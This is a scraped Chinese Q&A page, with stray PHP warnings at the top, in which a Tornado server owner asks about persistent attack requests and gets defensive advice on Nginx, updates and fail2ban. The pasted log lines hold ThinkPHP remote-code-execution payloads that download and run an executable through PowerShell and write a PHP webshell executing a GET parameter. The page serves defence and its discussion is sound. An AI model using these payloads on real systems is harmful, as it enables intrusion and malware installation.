Warning: file_get_contents(/data/phpspider/zhask/data//catemap/2/python/338.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Python 在Linux(Raspbian)机器上运行Tornado时,我需要关于持续黑客尝试的建议_Python_Tornado - Fatal编程技术网

Python 在Linux(Raspbian)机器上运行Tornado时,我需要关于持续黑客尝试的建议

Python 在Linux(Raspbian)机器上运行Tornado时,我需要关于持续黑客尝试的建议,python,tornado,Python,Tornado,在这个问题上我束手无策,我的研究毫无结果。 我在Linux操作系统上运行Tornado web服务器,我的Python脚本没有任何问题。我遇到的问题和需要的建议是保护自己免受黑客攻击 在过去的两周里,我的Tornado服务器或多或少地将以下内容写入每日错误日志: 警告:龙卷风。访问:404获取 /public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&

在这个问题上我束手无策,我的研究毫无结果。 我在Linux操作系统上运行Tornado web服务器,我的Python脚本没有任何问题。我遇到的问题和需要的建议是保护自己免受黑客攻击

在过去的两周里,我的Tornado服务器或多或少地将以下内容写入每日错误日志:

警告:龙卷风。访问:404获取 /public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cmd.exe%20/c%20powershell%20(新对象%20System.Net.WebClient)。下载文件(“”,'c:/12.exe');启动%20C:/12.exe (58.56.76.210)12.70毫秒

警告:龙卷风。访问:404获取 /public/index.php?s=/index/%5think%5Capp/invokefunction&function=call\u user\u func\u array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%5E%3C?php%20$action%20=%20$\u GET%5B'xcmd'%5D;系统($action);?%5E%3E%3Ehydra.php (58.56.76.210)4.82毫秒

警告:龙卷风。访问:404获取 /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(新对象%20System.Net.WebClient)。下载文件(“”,'c:/12.exe');启动%20C:/12.exe (58.56.76.210)3.97毫秒

ip地址表明他位于中国

我不知道发生了什么,除了黑客一定认为他在攻击一台“Windows”pc之外。web服务器发布一个网页,我的客户端使用该网页访问服务器。更改端口号对我没有好处,因为我必须保持Tornado端口打开,因为这是我的客户访问所必需的。无论我用什么端口号,他都会用端口扫描器找到

我已安装“fail2ban”并更改了ssh端口。我正在强制ssh的密码访问和rsa访问

我最担心的是,他最终会做对,窃取有价值的软件、数据和个人信息


请告知他正在尝试做什么,以及我可以做什么来保护机器免受不必要的访问。

欢迎访问Internet

这没什么不正常的。如果您有一个在线运行的服务器,它将收到这些垃圾邮件请求。这些请求是由某个bot脚本发送的,该脚本扫描web以查找易受攻击的服务器

以下是一些保护服务器免受这些攻击的提示:

  • 使您的服务器保持最新
  • 在Nginx后面运行龙卷风是个好主意。这是因为Nginx用户发布安全更新的速度比Tornado快
  • 只响应尝试访问您的域名的请求,而不响应您的IP地址。
    例如,如果有人试图访问
    example.com/path
    ,请仅对此作出响应。对于
    IPAddress/path
    ,返回404。这是因为大多数bot脚本只知道服务器的IP,而不知道域。但是普通用户将始终使用您的域访问您的网站。Nginx背后运行龙卷风的另一个原因
  • 运行
    fail2ban
    -它将扫描Nginx错误日志,查找发出虚假请求的IP地址,并在指定的时间段内禁止它们。了解它是如何工作的
  • 如果您的服务器具有SSH访问权限,那么可以很好地保证bot脚本试图使用伪造的用户名和密码通过SSH登录
    fail2ban
    也可以帮助您处理此问题。这里有一个关于设置
    fail2ban
    的好教程: